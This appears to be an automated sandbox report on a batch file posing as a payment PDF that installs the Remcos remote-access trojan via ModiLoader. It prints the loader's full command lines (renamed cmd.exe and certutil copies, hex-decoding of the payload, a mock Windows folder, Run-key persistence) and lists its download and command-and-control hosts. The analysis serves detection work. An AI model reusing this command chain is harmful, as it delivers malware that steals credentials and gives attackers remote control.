Malware Analysis Report

2025-01-02 03:03

Sample ID 240813-khw45atdrb
Target PAYMENT TRANSFER ERROR.PDF.bat
SHA256 de6f03e7fe7a7c5aa0462d01bd825650bd44acb38e130fc106de4b2c63d7f046
Tags
modiloader remcos remotehost discovery persistence rat trojan collection credential_access stealer
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

de6f03e7fe7a7c5aa0462d01bd825650bd44acb38e130fc106de4b2c63d7f046

Threat Level: Known bad

The file PAYMENT TRANSFER ERROR.PDF.bat was found to be: Known bad.

Malicious Activity Summary

modiloader remcos remotehost discovery persistence rat trojan collection credential_access stealer

Remcos

ModiLoader, DBatLoader

Credentials from Password Stores: Credentials from Web Browsers

ModiLoader Second Stage

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of SetThreadContext

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: MapViewOfSection

Modifies system certificate store

Script User-Agent

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-13 08:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-13 08:36

Reported

2024-08-13 08:39

Platform

win7-20240708-en

Max time kernel

148s

Max time network

151s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Remcos

rat remcos

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Wclbjzkj = "C:\\Users\\Public\\Wclbjzkj.url" | C:\Users\Public\Libraries\AHA.COM | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\xpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Libraries\AHA.COM | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SndVol.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\esentutl.exe | N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C | C:\Users\Public\Libraries\AHA.COM | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = <blob omitted> | C:\Users\Public\Libraries\AHA.COM | N/A

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\Libraries\AHA.COM | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Public\Libraries\AHA.COM | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1716 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1716 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1716 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 1716 wrote to memory of 1724 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1724 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1724 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1724 wrote to memory of 1708 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1724 wrote to memory of 1708 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1724 wrote to memory of 1708 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1716 wrote to memory of 2284 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2284 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2284 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2284 wrote to memory of 2248 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2284 wrote to memory of 2248 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2284 wrote to memory of 2248 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 1716 wrote to memory of 2240 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2240 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2240 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2240 wrote to memory of 2848 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2240 wrote to memory of 2848 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2240 wrote to memory of 2848 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 1716 wrote to memory of 760 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 760 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 760 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 760 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\AHA.COM
PID 1716 wrote to memory of 1700 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1700 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 1700 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2168 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2168 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1716 wrote to memory of 2168 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 760 wrote to memory of 2952 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 2952 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 2952 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\cmd.exe
PID 760 wrote to memory of 2952 | N/A | C:\Users\Public\Libraries\AHA.COM | C:\Windows\SysWOW64\cmd.exe
PID 2952 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 1848 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 308 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\esentutl.exe
PID 2952 wrote to memory of 808 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 808 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 808 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 808 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2556 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 1936 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 1936 wrote to memory of 1448 | N/A | C:\Users\Public\alpha.pif | C:\Users\Public\xpha.pif
PID 1936 wrote to memory of 1448 | N/A | C:\Users\Public\alpha.pif | C:\Users\Public\xpha.pif
PID 1936 wrote to memory of 1448 | N/A | C:\Users\Public\alpha.pif | C:\Users\Public\xpha.pif
PID 1936 wrote to memory of 1448 | N/A | C:\Users\Public\alpha.pif | C:\Users\Public\xpha.pif
PID 2952 wrote to memory of 2072 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2072 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2072 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2072 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif
PID 2952 wrote to memory of 2920 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Public\alpha.pif

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AHA.GIF" / A / F / Q / S

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Libraries\jkzjblcW.cmd" "

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Users\Public\xpha.pif

C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Windows \SysWOW64\per.exe

"C:\\Windows \\SysWOW64\\per.exe

C:\Windows \SysWOW64\per.exe

"C:\Windows \SysWOW64\per.exe"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AHA.COM /d C:\\Users\\Public\\Libraries\\Wclbjzkj.PIF /o

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\System32\SndVol.exe

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 2007.filemail.com | udp
DE | 50.7.84.74:443 | 2007.filemail.com | tcp
DE | 50.7.84.74:443 | 2007.filemail.com | tcp
N/A | 127.0.0.1:59089 | | tcp
US | 8.8.8.8:53 | legacyrem.duckdns.org | udp
MY | 103.186.116.130:59089 | legacyrem.duckdns.org | tcp
MY | 103.186.116.130:59089 | legacyrem.duckdns.org | tcp

Files

\Users\Public\alpha.exe

MD5 5746bd7e255dd6a8afa06f7c42c1ba41
SHA1 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256 db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA512 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

\Users\Public\kn.exe

MD5 ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1 ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA256 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA512 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

C:\Users\Public\AHA.GIF

MD5 2ddfa3ebd56847d40e59f092be0e6568
SHA1 3e56b1a986cd5600bc8dd134f1ff2ce5dbd53827
SHA256 11693a473afe426024135c37b1013491c2e98d89e6c9da6edfcc0a8c28bf1d02
SHA512 92816361505672a82452ed2036120a3d45e6abfa52577db819ba56318109da5242428bdf521751d6832976bc63831ddbaf0c10ad6563d26ed7b177f276421652

C:\Users\Public\Libraries\AHA.COM

MD5 d70fa5471771d18888f0861ac060a914
SHA1 83ef28ef9e4850629433f497fd0360120449e297
SHA256 31a7e70deb8af07d7b76b5dea8cbf90ec63bea24bffdd5ebac6f223c02f55753
SHA512 af89922e5a24a12522603e4a034b2e1aef911d5cf6399de426aa95b971dcf70513a99f45033895939f0475d7b001054717c9b0d38278ff45ee2b41376f3da31b

memory/760-34-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

memory/760-36-0x0000000002FB0000-0x0000000003FB0000-memory.dmp

memory/760-38-0x0000000000400000-0x0000000000540000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB6E3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarB714.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Public\Libraries\jkzjblcW.cmd

MD5 b87f096cbc25570329e2bb59fee57580
SHA1 d281d1bf37b4fb46f90973afc65eece3908532b2
SHA256 d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e
SHA512 72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

\Users\Public\alpha.pif

MD5 ad7b9c14083b52bc532fba5948342b98
SHA1 ee8cbf12d87c4d388f09b4f69bed2e91682920b5
SHA256 17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae
SHA512 e12aad20c824187b39edb3c7943709290b5ddbf1b4032988db46f2e86da3cf7e7783f78c82e4dc5da232f666b8f9799a260a1f8e2694eb4d0cdaf78da710fde1

C:\Users\Public\xpha.pif

MD5 6242e3d67787ccbf4e06ad2982853144
SHA1 6ac7947207d999a65890ab25fe344955da35028e
SHA256 4ca10dba7ff487fdb3f1362a3681d7d929f5aa1262cdfd31b04c30826983fb1d
SHA512 7d0d457e1537d624119a8023bcc086575696a5739c0460ef11554afac13af5e5d1edc7629a10e62834aba9f1b3ab1442011b15b4c3930399d91dca34b3b1cbaf

C:\Windows \SysWOW64\per.exe

MD5 869640d0a3f838694ab4dfea9e2f544d
SHA1 bdc42b280446ba53624ff23f314aadb861566832
SHA256 0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA512 6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

memory/1144-138-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-143-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-142-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-141-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-137-0x0000000002640000-0x0000000003640000-memory.dmp

memory/1144-145-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-146-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-147-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-148-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-149-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-150-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-156-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-157-0x000000002C460000-0x000000002C4E2000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 b875da0a35144e3e532af56571df9959
SHA1 ba378dcc14882571fd7c23e680bd7c499644dba9
SHA256 aeb083a04ac3b1472d18bf411feee008fdd4a9f43d698d472b22799565064235
SHA512 238710866ca2d659047c88e059367896e4d39cdef43c3fb6dc3210d3772a3ed3f6d1aa2169bca8925d91c9803407c70014e483e09cd3ae07ea71e782dd12bda6

memory/1144-164-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-165-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-168-0x000000002BF60000-0x000000002BF79000-memory.dmp

memory/1144-171-0x000000002BF60000-0x000000002BF79000-memory.dmp

memory/1144-172-0x000000002BF60000-0x000000002BF79000-memory.dmp

memory/1144-173-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-178-0x000000002C460000-0x000000002C4E2000-memory.dmp

memory/1144-179-0x000000002C460000-0x000000002C4E2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-13 08:36

Reported

2024-08-13 08:39

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows \SysWOW64\per.exe | N/A

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\SndVol.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wclbjzkj = "C:\\Users\\Public\\Wclbjzkj.url" | C:\Users\Public\Libraries\AHA.COM | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1660 set thread context of 2892 | N/A | C:\Windows\SysWOW64\SndVol.exe | C:\Windows\SysWOW64\SndVol.exe
PID 1660 set thread context of 1116 | N/A | C:\Windows\SysWOW64\SndVol.exe | C:\Windows\SysWOW64\SndVol.exe
PID 1660 set thread context of 3668 | N/A | C:\Windows\SysWOW64\SndVol.exe | C:\Windows\SysWOW64\SndVol.exe

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SndVol.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SndVol.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SndVol.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\xpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\Libraries\AHA.COM | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Public\alpha.pif | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\SndVol.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\esentutl.exe | N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Public\pha.pif | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = <blob omitted> | C:\Users\Public\pha.pif | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = <blob omitted> | C:\Users\Public\pha.pif | N/A

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Public\pha.pif | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 5044 wrote to memory of 1856 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 5044 wrote to memory of 1856 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\extrac32.exe
PID 5044 wrote to memory of 1116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 1116 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 1116 wrote to memory of 1012 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 1116 wrote to memory of 1012 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 5044 wrote to memory of 4876 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 4876 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4876 wrote to memory of 5032 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 4876 wrote to memory of 5032 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 5044 wrote to memory of 3676 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 3676 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
